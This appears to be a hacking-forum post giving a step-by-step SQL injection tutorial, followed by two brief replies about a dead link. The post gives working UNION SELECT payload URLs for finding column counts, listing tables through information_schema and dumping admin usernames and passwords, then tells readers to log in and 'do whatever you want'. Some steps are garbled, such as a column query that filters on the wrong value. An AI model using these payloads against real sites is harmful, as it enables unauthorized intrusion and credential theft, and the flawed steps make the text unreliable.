[Tutorial] Blazer First Sql Injection Tutorial!!!!!

[The High Roller]

 

1. Find a vulnerable website. here is a example!

 

2.

http://www.site.com/index.php?=5'

 

Ps:Don't type error after after this (--)

 

3.

http://www.site.com/index.php?=5 order by 10-- error

 

http://www.site.com/index.php?=5 order by 9-- error

 

http://www.site.com/index.php?=5 order by 8-- No error

:cheers:

 

4. the site has 8 columns.

 

5. Do like below:)

 

6.

http://www.site.com/index.php?=-5 union select 1,2,3,4,5,6,7,8--

 

7. This will show some numbers on the page lets say it is number 3 on the page.

 

8.Let's get some tables:

http://www.site.com/index.php?=-5 union select 1,2,group_concat(table_name),4,5,6,7,8 from information_schema.tables--

 

9. You will see tables: check for anything like admin, username, user. I found admin and lets start harvesting:)

 

10.Type this:

http://www.site.com/index.php?=-5 union select 1,2,group_concat(column_name),4,5,6,7,8 from information_schema.columns where table_name=database()--

 

11.Now you have the table name and the name is admin that you finded before this.Now  the columns that you will see right now is maybe Username or Password.

 

12. Soo to get the password and username from admin type this.

 

13.

http://www.site.com/index.php?=-5 union select 1,2,group_concat(username,0x3a,password),4,5,6,7,8 from admin

 

14. And press enter.

 

15. you will see this. username:password.

ps: the password can be plain text or in a hash:)

16. now get admin page and login and do whatever you want.

 

17. creedits to blazer15. :cheers:

 

I tried my best! but i hope it will help you:):blackhat:

 

[Vyper]

Probably an old tutorial c/p since the site is not working.

[The High Roller]

Probably an old tutorial c/p since the site is not working.

 

dont worry dude i will re-upload new links ;)